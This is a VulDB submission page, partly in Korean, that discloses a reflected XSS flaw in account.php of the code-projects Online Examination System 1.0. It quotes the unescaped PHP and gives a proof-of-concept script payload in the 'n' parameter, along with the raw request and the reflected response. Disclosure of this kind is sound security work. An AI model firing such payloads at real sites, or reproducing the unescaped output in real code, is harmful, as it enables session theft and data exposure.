제출 #857999: Reflected XSS Vulnerability in account.php of the Online Examination System v1 Reflected XSS정보

제목Reflected XSS Vulnerability in account.php of the Online Examination System v1 Reflected XSS
설명# Reflected XSS Vulnerability in `account.php` of the Online Examination System The quiz answering function of the Online Examination System is handled by `account.php`. When a user accesses the quiz page with `q=quiz&step=2`, the backend reads the `eid`, `n`, and `t` parameters from the URL. In the code, `account.php:164-166` directly reads these parameters, and `account.php:176` concatenates them into the HTML form `action` attribute without any output encoding: ```php $eid=@$_GET['eid']; $sn=@$_GET['n']; $total=@$_GET['t']; ... echo '<form action="update.php?q=quiz&step=2&eid='.$eid.'&n='.$sn.'&t='.$total.'&qid='.$qid.'" method="POST" class="form-horizontal"> <br />'; ``` Because the application does not perform HTML escaping or output sanitization, an attacker can inject malicious script content through the `n` parameter, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. This endpoint is not publicly accessible. It requires an authenticated student session because `account.php` checks for `$_SESSION['email']` before rendering the page. ## Impact of the Reflected XSS Vulnerability An attacker can exploit this vulnerability to execute arbitrary JavaScript in the victim's browser within the context of the authenticated student session. This may lead to session theft, sensitive data disclosure, page content manipulation, phishing, or unauthorized actions performed on behalf of the victim. ## Payload Injection parameter: `n` Injected value: ```text "><sCrIpT>alert(9999)</sCrIpT> ``` Request method: `GET` Request path: ```text /account.php?q=quiz&step=2&eid=6a20deccc257d&n="><sCrIpT>alert(9999)</sCrIpT>&t=1 ``` Raw request: ```http GET /account.php?q=quiz&step=2&eid=6a20deccc257d&n="><sCrIpT>alert(9999)</sCrIpT>&t=1 HTTP/1.1 Host: project1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://project1/account.php?q=1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: PHPSESSID=2347fp9qoucglmem34csap1fbp Connection: keep-alive ``` Reflected response snippet: ```html <!--quiz start--> <div class="panel" style="margin:5%"><form action="update.php?q=quiz&step=2&eid=6a20deccc257d&n="><sCrIpT>alert(9999)</sCrIpT>&t=1&qid=" method="POST" class="form-horizontal"> <br /><br /><button type="submit" class="btn btn-primary"><span class="glyphicon glyphicon-lock" aria-hidden="true"></span>&nbsp;Submit</button></form></div><!--quiz end--> ``` The response shows that the injected payload is reflected into the HTML without encoding, which can cause the browser to parse and execute the attacker-controlled script. ## Sources Download ## ``` - [Online Examination In PHP With Source Code - Source Code & Projects](https://code-projects.org/online-examination-in-php-with-source-code/) ``` [Online Examination In PHP With Source Code - Source Code & Projects](https://code-projects.org/online-examination-in-php-with-source-code/)
원천⚠️ https://github.com/zzzxc643/CVE1/blob/main/project1/vul5.md
사용자
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
제출2026. 06. 13. PM 04:05 (1 월 ago)
모더레이션2026. 07. 18. PM 12:07 (1 month later)
상태수락
VulDB 항목380043 [code-projects Online Examination System 1.0 /account.php?q=quiz eid/n/t 크로스 사이트 스크립팅]
포인트들20

Want to know what is going to be exploited?

We predict KEV entries!